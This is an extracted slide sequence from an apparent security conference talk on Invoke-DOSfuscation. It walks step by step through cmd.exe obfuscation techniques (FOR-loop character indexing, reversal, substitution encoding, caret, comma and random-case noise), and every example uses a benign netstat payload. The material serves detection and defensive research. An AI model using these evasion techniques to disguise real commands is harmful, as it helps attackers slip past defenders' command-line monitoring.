For the past 9 months I have
hunted across:
• Public file repositories
• Private file repositories
• Sandbox execution reports
• Endpoint detections for 10+
million endpoints
![Page 142: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/142.jpg)
142
FOR Score And Seven Obfuscation Techniques Ago…
https://www.whitehouse.gov/sites/whitehouse.gov/files/images/first-family/16_abraham_lincoln%5B1%5D.jpg
Payload Obfuscation 2 of 4: FORcoding
![Page 143: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/143.jpg)
143
Payload Obfuscation 2 of 4: FORcoding
![Page 144: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/144.jpg)
144
• cmd /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 145: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/145.jpg)
145
• cmd /v /c netstat /ano
• /V
• /V:ON
• /VERBOSE
• /V:::::::::::
• /V=====
• /V_-/\-_
Payload Obfuscation 2 of 4: FORcoding
![Page 146: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/146.jpg)
146
• cmd /v /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 147: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/147.jpg)
147
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
![Page 148: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/148.jpg)
148
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
![Page 149: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/149.jpg)
149
• cmd /v /r netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
![Page 150: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/150.jpg)
150
• cmd /v /r netstat /ano
https://s3.caradvice.com.au/thumb/1200/630/wp-
content/uploads/2014/01/ownerreview-honda-cr-v.jpg
Payload Obfuscation 2 of 4: FORcoding
![Page 151: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/151.jpg)
151
• cmd /v /r netstat /ano
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
![Page 152: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/152.jpg)
152
• cmd Never Gonna Give You Up/vNever Gonna Let You Down/r netstat /ano
https://postmediavancouversun2.files.wordpress.com/2016/10/giphy.gif
Payload Obfuscation 2 of 4: FORcoding
![Page 153: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/153.jpg)
153
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 154: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/154.jpg)
154
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 155: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/155.jpg)
155
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 156: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/156.jpg)
156
• cmd /v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 157: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/157.jpg)
157
• cmd /v /r "set unique=nets /ao&&…"
Payload Obfuscation 2 of 4: FORcoding
![Page 158: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/158.jpg)
158
• cmd /v /r "set unique=nets /ao&&FOR %A IN ( ) DO…"
n e t s / a o
0 1 2 3 4 5 6 7
Payload Obfuscation 2 of 4: FORcoding
![Page 159: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/159.jpg)
159
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n
![Page 160: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/160.jpg)
160
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e
![Page 161: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/161.jpg)
161
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t
![Page 162: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/162.jpg)
162
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
![Page 163: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/163.jpg)
163
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
Arbitrary
end-of-index
delimiter
![Page 164: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/164.jpg)
164
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&…"
Appending char at
each index (%A)
to !final! env var.
Payload Obfuscation 2 of 4: FORcoding
![Page 165: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/165.jpg)
165
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
• ==1337
• EQU 1337
• GEQ 1337
• GTR 1336
https://ss64.com/nt/if.html
Payload Obfuscation 2 of 4: FORcoding
![Page 166: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/166.jpg)
166
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
Payload Obfuscation 2 of 4: FORcoding
![Page 167: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/167.jpg)
167
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13
1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-
12%"
Payload Obfuscation 2 of 4: FORcoding
![Page 168: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/168.jpg)
168
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13
1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
Payload Obfuscation 2 of 4: FORcoding
![Page 169: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/169.jpg)
169
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1 3 5 7 5 13 5 9 11 13
1 15 1337) dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
•
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
![Page 170: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/170.jpg)
170
• cMd/v/R"sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1,3;5,7;5,13;5,9;11,
13,1;15,1337)dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
![Page 171: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/171.jpg)
171
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE && foR %a iN ( 1 3
5 7 5 13 5 9 11 13 1 15 1337 ) dO sEt fINal=!finAl!!uniQue:~ %a,
1!&& iF %a == 1337 CalL %fInAl:~ -12% "
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
![Page 172: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/172.jpg)
172
• ,;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3
5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a,
1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% "
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
•
•
•
Payload Obfuscation 2 of 4: FORcoding
![Page 173: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/173.jpg)
173
• ,;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;;
i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
•
•
Payload Obfuscation 2 of 4: FORcoding
![Page 174: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/174.jpg)
174
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;;
i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,(;(;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a,=^=;13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
•
Payload Obfuscation 2 of 4: FORcoding
![Page 175: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/175.jpg)
175
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;;
i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
• Explicit signing
Payload Obfuscation 2 of 4: FORcoding
![Page 176: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/176.jpg)
176
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
![Page 177: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/177.jpg)
• cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set
final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
177
FORcoding
Reverse
Payload Obfuscation 3 of 4: Reversal
Reversing is similar to FORcoding, but has
simpler indexing with FOR loop's /L argument.
![Page 178: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/178.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
178
Payload Obfuscation 3 of 4: Reversal
FORcoding
Reverse
Reversing is similar to FORcoding, but has
simpler indexing with FOR loop's /L argument.
![Page 179: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/179.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
179
• ==1
• EQU 1
• LEQ 1
• LSS 2
https://ss64.com/nt/if.html
Payload Obfuscation 3 of 4: Reversal
![Page 180: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/180.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
180
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~-12%
netstat /ano
![Page 181: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/181.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~7%"
181
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
![Page 182: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/182.jpg)
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO
set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%"
182
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
C:\> echo %final:*final!=%
netstat /ano
Payload Obfuscation 3 of 4: Reversal
![Page 183: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/183.jpg)
• cmd /v /r "set command=netstat /ano&&CALL %command%"
183
Payload Obfuscation 4 of 4: FINcoding
![Page 184: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/184.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&CALL %command%"
184
Payload Obfuscation 4 of 4: FINcoding t Z
![Page 185: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/185.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL
%command%"
185
Z t
Payload Obfuscation 4 of 4: FINcoding t Z
![Page 186: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/186.jpg)
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL
%sub1%"
186
Z t
Payload Obfuscation 4 of 4: FINcoding t Z
![Page 187: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/187.jpg)
• cmd /v /r "set command=neZsZ7Z /7no&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&CALL %sub2%"
187
Z t
7 a
Payload Obfuscation 4 of 4: FINcoding t Z
a 7
![Page 188: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/188.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
188
Z t
7 a
? n
t Z
a 7
n ?
Payload Obfuscation 4 of 4: FINcoding
![Page 189: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/189.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
189
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
•
•
![Page 190: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/190.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
190
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
•
![Page 191: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/191.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
191
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
![Page 192: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/192.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
192
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
![Page 193: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/193.jpg)
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set
sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set
sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set
sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
193
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
Payload Obfuscation 4 of 4: FINcoding
![Page 194: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/194.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
